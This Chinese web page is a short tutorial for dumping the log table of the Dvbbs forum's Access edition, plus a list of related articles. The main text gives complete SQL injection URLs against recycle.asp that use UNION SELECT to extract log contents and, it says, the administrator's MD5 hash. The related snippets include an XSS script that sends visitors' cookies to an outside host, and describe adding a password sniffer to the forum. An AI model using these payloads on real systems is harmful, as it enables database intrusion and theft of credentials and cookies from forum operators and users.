动网access版暴log库终极大法
注:需要获得前台管理员权限后使用
文章中指定recycle.asp?tablename=Dv_bbs1%20union%20select%201,1,l_content,1,1,1%20from%20dv_log%20where%20l_id=5%20union%20select%201,1,1,1,1,1%20from%20dv_bbs1&page=2000(回收站的最后页的id),指变换l_id=‘'的值来暴出l_concent的值一次只能暴一个内容,看了下动网的数据库表,只要指定l_announceid=0就可以全部暴出,语句这样构造recycle.asp?tablename=Dv_bbs1%20union%20select%201,1,l_content,1,1,1%20from%20dv_log%20where%20l_announceid=0%20union%20select%201,1,1,1,1,1%20from%20dv_bbs1&page=2000嘿嘿,是不是全部暴出来了,构造适当的语句可以暴出管理员的后台md5值等等内容。另注:暴出数据字段的内容是回收站帖子的最后页!
相关推荐
-
动网access版暴log库终极大法
注:需要获得前台管理员权限后使用 文章中指定recycle.asp?tablename=Dv_bbs1%20union%20select%201,1,l_content,1,1,1%20from%20dv_log%20where%20l_id=5%20union%20select%201,1,1,1,1,1%20from%20dv_bbs1&page=2000(回收站的最后页的id),指变换l_id=''的值来暴出l_concent的值一次只能暴一个内容,看了下动网的数据库表,只要指定l_ann
-
动网论坛验证码改进 加法验证码(ASPJpeg版)
来看看效果图对比:字符验证码: → 加法验证码:优点: ①与纯字符验证码相比,本程序效防止了绝大部分(99%以上)广告机的自动识别.即使是中文验证码,也能被市面上的部分广告机识别. ②与中文验证码相比,避免了用户输入用户名密码验证码的时候需要切换输入法的麻烦. 有兴趣的朋友,还可以扩展为其他的运算,比如乘法,减法,乘方等. 使用方法:将以下代码保存为Dv_GetCode.asp文件,替换动网论坛的该文件.背景色.字体颜色可在代码中修改. 说明:该程序需要网站空间支持ASPJpeg组件.楷体_GB
-
动网7.x权限提升漏洞原理
在6月份的黑防上看到<动网7.1漏洞惊现江湖>一文,说是admin_postings.asp文件存在注入漏洞,但利用的前提是拥有超级版主或前台管理员权限.我想起以前发现的动网7.x版本存在一个前台权限提升漏洞, 正好可以结合起来利用.这个前台权限提升漏洞对7.x的Access和 SQL版都有效.下面我们就以7.0 SP2 SQL版,讲解这个漏洞的利用. 漏洞分析: 我们知道动网是通过GroupID来判断当前用户所在的组的,然后再通过组的信息判断用户的权限.它是如何取得这个GroupID的呢?让
-
动网dvbbs7.1论坛权限提升漏洞及防范(图)
在6月份的黑防上看到<动网7.1漏洞惊现江湖>一文,说是admin_postings.asp文件 存在注入漏洞,但利用的前提是拥有超级斑竹或前台管理员权限.我想起以前发现的动网7.x版本存在一个前台权限提升漏洞, 正好可以结合起来利用.这个前台权限提升漏洞对7.x的Access和 Sql版都有效.下面我们就以7.0 sp2 sql版,讲解这个漏洞的利用. 漏洞分析 我们知道动网是通过GroupID来判断当前用户所在的组的,然后再通过组的信息判断用户的权限.它是如何取得这个GroupID的呢?让
-
ASP个人网站与动网整合非官方方法
虽然动网已提供有详细的"动网论坛系统Api接口开发人员指南",但像我这样的菜鸟一时半会可是参详不透的,汗.不甘心,在对其登录.验证等函数进行一番研究再加以测试后最终竟也小有所成,菜鸟也有菜鸟的办法: 本次测试的论坛版本为Version 7.1.0 Sp1,未对其他版本做进行测试 一.网站文件结构 wwwroot ┝ index.asp ┝ CheckUserLogin.asp ┕ bbs/ 二.整合原理 对于同步更新实现不困难,整合主要问题就是难在同步登录,所以我们的
-
ASP类型网站结合动网论坛会员的方法第1/3页
个人网站如有会员注册模块+动网论坛的话,那网站要与动网论坛系统整合,实现不同Web系统之间的用户信息同步更新.登录等操作就不是件容易的事了,虽然动网已提供有详细的"动网论坛系统Api接口开发人员指南",但像我这样的菜鸟一时半会可是参详不透的,汗.不甘心,在对其登录.验证等函数进行一番研究再加以测试后最终竟也小有所成,菜鸟也有菜鸟的办法,哈哈. 一.网站文件结构 wwwroot ┝ index.asp ┝ CheckUserLogin.asp ┕ bbs/ 二.整合原理 对于
-
关于动网的cookie泻露站点绝路径的问题
一.跨站测试 先看看我的一次跨站测试吧 我以职业欠钱的站点做测试吧: Host:zhiyeqianqian.51web.cn My Test: 先在他的论谈上传两张图, 图一的内容是: <script>document.location='http://linzi.cnbct.org/cookie.asp?msg='+document.cookie</script> 得到url为UploadFile/2005-6/200562716565777847.jpg 图二则是偶的个人照 U
-
动网升级疑难集合(1)
-- 作者:飞天侠-- 发布时间:2006-4-26 1:08:52 -- 运行时错误记录与解决方案(动网) 1.问: Microsoft VBScript 运行时错误 错误 '800a01a8' 缺少对象: 'UserSession.documentElement' /bbs/inc/Dv_ClsMain.asp,行 518 升级SP1后出现这个错误!!是哪里出现问题呢? 答: 试试执行升级包中的更新服务器缓存 2.问:但在论坛用户组(等级)管理时出错如下: Microsoft VBSc
-
为动网论坛添加一个密码嗅探器(DVBBS)
动网先锋论坛,凭借其强大全面的功能,再加上它免费提供给个人用户,在网络众多论坛中,独树一帜.很多人都把它作为自己论坛的最佳首选.但是新版本的论坛,对用户密码采用了不可逆的MD5加密,即使是管理员,也无法查询到个人用户的密码.再数据库中只能查询了加密后的结果. 先描述一下它得登陆过程,用户输入帐号后号,调用MD5函数,输入的密码加密,然后比较存储在数据库的数据和密码加密的结果是否相同.如果相同,登陆成功,将个人信息保存在COOKIE中. 现在我们要自己动手,为论坛增加一项记录密码的功能. 查看它登
-
新思路现动网新漏洞
作者:优格GXU 文章来源:邪恶八进制信息安全团队 文章作者:优格[GXU] (www.wuzhou.org) 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 原文下载:http://www.wuzhou.org/dvbbs.doc 前段时间focn等人发现了动网的提权漏洞,这漏洞可是闹得天翻地覆的,连当当网论坛也给挂上马了.正是这个漏洞盖住了动网的其他漏洞,使动网的其他漏洞少为人知. 相信大家都看过<终结动网最新挂马方法!>的文章了,其实这个漏洞已经出现了大概半月了,
随机推荐
- js实现水平滚动菜单导航
- WMI 创建系统服务的实现代码(Automatic)
- 详解CentOS安装tomcat并且部署Java Web项目
- hibernate一对多关联映射学习小结
- PHP获取和操作配置文件php.ini的几个函数介绍
- Yii中CGridView关联表搜索排序方法实例详解
- 详解MySQL的limit用法和分页查询语句的性能分析
- webpack配置的最佳实践分享
- javascript监听页面刷新和页面关闭事件方法详解
- springmvc实现简单的拦截器
- BCP 大容量数据导入导出工具使用步骤
- [注册表]让光驱运行得更快
- 简述Linux下Samba服务的安装与配置
- 教你轻松玩转FTP
- Java 中HashCode作用_动力节点Java学院整理
- 在Linux下搭建Zookeeper管理中心步骤分享
- VMware虚拟机安装Fedora 27 Workstation正式版(图文)
- python Pandas库基础分析之时间序列的处理详解
- golang实现跨域访问的方法
- Python面向对象魔法方法和单例模块代码实例